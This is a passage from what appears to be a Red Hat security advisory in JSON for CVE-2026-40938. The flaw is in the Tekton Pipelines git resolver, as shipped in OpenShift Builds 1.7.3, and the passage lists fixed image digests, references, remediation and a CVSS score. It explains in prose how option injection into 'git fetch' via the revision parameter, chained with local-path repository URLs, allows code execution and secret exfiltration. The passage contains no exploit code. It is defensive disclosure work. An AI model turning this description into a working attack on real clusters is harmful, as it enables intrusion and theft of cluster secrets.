"category": "description",
"text": "A flaw was found in Tekton Pipelines, a system for declaring continuous integration/continuous delivery (CI/CD) pipelines. An authenticated user, able to submit `ResolutionRequest` objects, can exploit a vulnerability by injecting malicious commands into the git resolver\u0027s revision parameter. This allows for the execution of unauthorized programs on the resolver pod. Successful exploitation can lead to the exfiltration of all cluster-wide secrets, resulting in significant information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/tektoncd/pipeline: Tekton Pipelines: Arbitrary code execution and secret exfiltration via malicious git commands",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in Tekton Pipelines allows an authenticated user to achieve arbitrary code execution on the resolver pod by injecting malicious commands into the git resolver\u0027s revision parameter. This vulnerability happens because the `revision` parameter is passed as a positional argument to the `git fetch` command without any previous validation whether the parameter\u0027s value doesn\u0027t start with `-` character. Combining this lack of validation with the fact the function which validates the repository URL explicitly allows a repository URL to being with `/`, translating to a local filesystem. An attacker with enough privileges to perform an operation which trigger resolvers to use the `ResolutionRequest` function can \nchain both behaviors to trick Tekton Pipelines to load and execute an arbitrary binary on the resolver pod.\n\nExploring this vulnerability may be considered of a high complexity as an attacker needs to either know an existing valid git repository located at a predicable path already in the resolver pod or a default URL configuration pointing to a local filesystem\u0027s path.\n \nA successful exploitation of the flaw can lead to the exfiltration of all cluster-wide secrets, posing a significant risk to the integrity and confidentiality of the OpenShift environment. Additionally, depending on the data included in the `kubeconfig` files, an attacker may achieve privilege escalation or perform lateral movements within the targeted cluster.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
],
"known_not_affected": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40938"
},
{
"category": "external",
"summary": "RHBZ#2460292",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460292"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40938",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40938"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1",
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
}
],
"release_date": "2026-04-21T20:45:24.658000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-08T05:19:34+00:00",
"details": "It is recommended that existing users of Red Hat OpenShift Builds 1.7.2 upgrade to 1.7.3",
"product_ids": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24359"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
